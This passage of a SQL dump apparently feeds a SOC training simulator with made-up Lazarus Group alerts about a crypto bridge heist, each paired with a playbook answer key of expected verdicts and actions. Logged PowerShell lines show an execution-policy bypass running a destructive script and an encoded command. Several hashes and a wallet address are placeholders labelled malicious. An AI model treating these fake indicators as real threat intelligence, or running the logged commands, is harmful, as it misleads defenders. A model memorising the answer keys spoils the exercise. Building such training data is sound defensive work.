'2026-01-17 03:42:27', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.172.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known phishing server associated with Lazarus Group\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"john.doe@ronin-security.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Email Directory\",\"verdict\":\"internal\",\"details\":\"Employee of Ronin\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"Phishing site designed to harvest credentials\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"9c9c1c8a5f1c4e5a6c7e1e8f9f4b3c7d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with known malware 
campaigns\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Phishing Email\",\"date\":\"2026-02-01T20:32:22.682Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(992, 'Execution of Destructive Malware', 'high', 'Endpoint detection logs', 'The endpoint detection system has identified the execution of a known destructive malware variant associated with the Lazarus Group. The malware was executed to disable security measures, allowing attackers to move undetected within the network. Immediate containment actions are recommended to prevent further damage.', 'Malware Deployment', 'T1486 - Data Encrypted for Impact', 1, 'Closed', 74, '{\"timestamp\":\"2023-10-11T08:45:27Z\",\"event_id\":\"EVT-202310110001\",\"source_ip\":\"185.123.231.12\",\"internal_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"malware_filename\":\"destructo.exe\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"execution\",\"message\":\"Destructive malware detected and executed on host 192.168.1.10 by user jdoe. Associated with Lazarus Group activities.\"}', '2026-01-17 03:42:27', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.123.231.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Associated with known Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host where malware was executed.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"destructo.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Identified as destructive malware used by Lazarus 
Group.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known destructive malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(993, 'Establishing Persistence via Backdoor', 'medium', 'Network traffic analysis', 'The attackers installed a backdoor, ensuring they could re-enter the network as needed to continue their operation. This activity is consistent with tactics used by the Lazarus Group.', 'Backdoor Installation', 'TA0003 - Persistence', 1, 'new', 74, '{\"timestamp\":\"2023-10-01T14:45:00Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.15\",\"protocol\":\"TCP\",\"src_port\":443,\"dst_port\":8080,\"filename\":\"backdoor_installer.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"jdoe\",\"action\":\"File executed\",\"description\":\"A suspicious executable associated with known Lazarus Group activity was detected being executed on the network.\"}', '2026-01-17 03:42:27', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with Lazarus Group operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in the event.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"backdoor_installer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Filename commonly used in Lazarus Group campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Lazarus Group.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate 
user account on the network.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(994, 'Lateral Movement to Validator Nodes', 'high', 'Active Directory logs', 'Indicators of credential dumping were identified, suggesting lateral movement within the network, targeting validator nodes. This activity aligns with known tactics and techniques of the Lazarus Group.', 'Credential Dumping', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"logon_type\":\"3\",\"account_name\":\"jdoe\",\"source_ip\":\"203.0.113.42\",\"target_ip\":\"192.168.1.10\",\"process_name\":\"lsass.exe\",\"hash\":\"3f6d7c9e1b2f4d3e9a7fbc7e5a8e9ea6\",\"domain\":\"company.local\",\"message\":\"An attempt to dump credentials was detected from IP 203.0.113.42 targeting IP 192.168.1.10 using the process lsass.exe.\"}', '2026-01-17 03:42:27', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal validator node targeted for compromise.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f6d7c9e1b2f4d3e9a7fbc7e5a8e9ea6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a credential dumping tool used by the Lazarus Group.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"lsass.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"System Process\",\"verdict\":\"clean\",\"details\":\"Legitimate system process potentially exploited for credential dumping.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(995, 'Exfiltration of Cryptocurrency', 'critical', 'Blockchain transaction logs', 'With control over the validator nodes, the attackers exfiltrated $625 million in cryptocurrency, executing the largest crypto heist in history.', 'Data Exfiltration', 'T1567.002', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"event_id\":\"0x1a2b3c\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"transaction_id\":\"0x9f8b7a9d\",\"amount\":\"625000000\",\"currency\":\"USD\",\"wallet_address\":\"0x123abc456def789ghi101112jklmno\",\"malware_hash\":\"b8c7b15d3ef9a8f2e3c9a4f6d3e7a9d1\",\"user\":\"attacker_account\",\"filename\":\"transaction_exfil.exe\"}', '2026-01-17 03:42:27', '2026-02-16 17:49:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP used for transaction initiation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b8c7b15d3ef9a8f2e3c9a4f6d3e7a9d1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Associated with destructive malware used by Lazarus Group.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"transaction_exfil.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable used for exfiltrating cryptocurrency.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 
'beginner', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.687Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":\\\"0x1a2b3c\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"transaction_id\\\":\\\"0x9f8b7a9d\\\",\\\"amount\\\":\\\"625000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"wallet_address\\\":\\\"0x123abc456def789ghi101112jklmno\\\",\\\"malware_hash\\\":\\\"b8c7b15d3ef9a8f2e3c9a4f6d3e7a9d1\\\",\\\"user\\\":\\\"attacker_account\\\",\\\"filename\\\":\\\"transaction_exfil.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.687Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":\\\"0x1a2b3c\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"transaction_id\\\":\\\"0x9f8b7a9d\\\",\\\"amount\\\":\\\"625000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"wallet_address\\\":\\\"0x123abc456def789ghi101112jklmno\\\",\\\"malware_hash\\\":\\\"b8c7b15d3ef9a8f2e3c9a4f6d3e7a9d1\\\",\\\"user\\\":\\\"attacker_account\\\",\\\"filename\\\":\\\"transaction_exfil.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.687Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":\\\"0x1a2b3c\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"transaction_id\\\":\\\"0x9f8b7a9d\\\",\\\"amount\\\":\\\"625000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"wallet_address\\\":\\\"0x123abc456def789ghi101112jklmno\\\",\\\"malware_hash\\\":\\\"b8c7b15d3ef9a8f2e3c9a4f6d3e7a9d1\\\",\\\"user\\\":\\\"attacker_account\\\",\\\"filename\\\":\\\"transaction_exfil.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.687Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":\\\"0x1a2b3c\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"transaction_id\\\":\\\"0x9f8b7a9d\\\",\\\"amount\\\":\\\"625000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"wallet_address\\\":\\\"0x123abc456def789ghi101112jklmno\\\",\\\"malware_hash\\\":\\\"b8c7b15d3ef9a8f2e3c9a4f6d3e7a9d1\\\",\\\"user\\\":\\\"attacker_account\\\",\\\"filename\\\":\\\"transaction_exfil.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.687Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":\\\"0x1a2b3c\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"transaction_id\\\":\\\"0x9f8b7a9d\\\",\\\"amount\\\":\\\"625000000\\\",\\\"currency\\\":\\\"USD\\\",\\\"wallet_address\\\":\\\"0x123abc456def789ghi101112jklmno\\\",\\\"malware_hash\\\":\\\"b8c7b15d3ef9a8f2e3c9a4f6d3e7a9d1\\\",\\\"user\\\":\\\"attacker_account\\\",\\\"filename\\\":\\\"transaction_exfil.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(996, 'Suspicious Multi-Sig Scheme Compromise', 'high', 'Blockchain security monitoring tools', 'An initial access attempt was detected targeting a multi-signature wallet, potentially linked to the Lazarus Group. The operation aims to exploit vulnerabilities in the multi-sig scheme, setting the stage for a cryptocurrency heist.', 'Initial Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-16T08:45:12Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.5\",\"user\":\"admin_user\",\"event\":\"multi-sig_wallet_access_attempt\",\"details\":{\"description\":\"Unauthorized access attempt detected\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"wallet_access_tool.exe\",\"signature\":\"Lazarus Group\"}}', '2026-01-17 03:44:49', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted multi-sig wallet server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known Lazarus Group malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"wallet_access_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Detection\",\"verdict\":\"suspicious\",\"details\":\"Filename used in unauthorized access attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.688Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T08:45:12Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"event\\\":\\\"multi-sig_wallet_access_attempt\\\",\\\"details\\\":{\\\"description\\\":\\\"Unauthorized access attempt detected\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"wallet_access_tool.exe\\\",\\\"signature\\\":\\\"Lazarus Group\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.688Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T08:45:12Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"event\\\":\\\"multi-sig_wallet_access_attempt\\\",\\\"details\\\":{\\\"description\\\":\\\"Unauthorized access attempt detected\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"wallet_access_tool.exe\\\",\\\"signature\\\":\\\"Lazarus Group\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.688Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T08:45:12Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"event\\\":\\\"multi-sig_wallet_access_attempt\\\",\\\"details\\\":{\\\"description\\\":\\\"Unauthorized access attempt 
detected\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"wallet_access_tool.exe\\\",\\\"signature\\\":\\\"Lazarus Group\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.688Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T08:45:12Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"event\\\":\\\"multi-sig_wallet_access_attempt\\\",\\\"details\\\":{\\\"description\\\":\\\"Unauthorized access attempt detected\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"wallet_access_tool.exe\\\",\\\"signature\\\":\\\"Lazarus Group\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.688Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T08:45:12Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"event\\\":\\\"multi-sig_wallet_access_attempt\\\",\\\"details\\\":{\\\"description\\\":\\\"Unauthorized access attempt detected\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"wallet_access_tool.exe\\\",\\\"signature\\\":\\\"Lazarus Group\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(997, 'Destructive Malware Deployment', 'high', 'Endpoint detection and response (EDR) logs', 'An attempt to deploy destructive malware was detected on the network. The malware aims to disrupt bridge operations and mask illicit activities by echoing the signature tactics of the Lazarus Group.', 'Execution', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"execution\",\"event_id\":\"12345\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Temp\\\\destructo.ps1\",\"file_name\":\"destructo.ps1\",\"file_hash\":\"7c6a180b36896a0a8c02787eeafb0e4c\",\"process_id\":6789,\"parent_process\":\"explorer.exe\",\"parent_process_id\":4567}', '2026-01-17 03:44:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address belonging to the corporate network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Lazarus Group activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"7c6a180b36896a0a8c02787eeafb0e4c\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known destructive malware used by the Lazarus Group.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"destructo.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"file analysis\",\"verdict\":\"suspicious\",\"details\":\"File name associated with unusual PowerShell 
activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(998, 'Cryptocurrency Laundering Infrastructure Detected', 'high', 'Cryptocurrency transaction analysis', 'Stolen funds are being processed through a complex laundering network involving mixers and exchanges. The operation is linked to the Lazarus Group, known for their advanced financial theft techniques.', 'Exfiltration', 'T1537 - Transfer Data to a Different Medium', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:20:35Z\",\"transaction_id\":\"tx1234567890abcdef\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"hash\":\"a1b2c3d4e5f67890123456789abcdef0123456789abcdef0123456789abcdef0\",\"mixer_address\":\"1MixerXYZ123456789abcdef\",\"exchange_domain\":\"cryptomixexchange.com\",\"user\":\"john.doe@example.com\",\"amount\":\"10 BTC\",\"malicious\":true}', '2026-01-17 03:44:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known Lazarus Group IP associated with cryptocurrency laundering.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890123456789abcdef0123456789abcdef0123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash of the malware used in the laundering operation.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"cryptomixexchange.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"suspicious\",\"details\":\"Domain associated with suspicious cryptocurrency exchange 
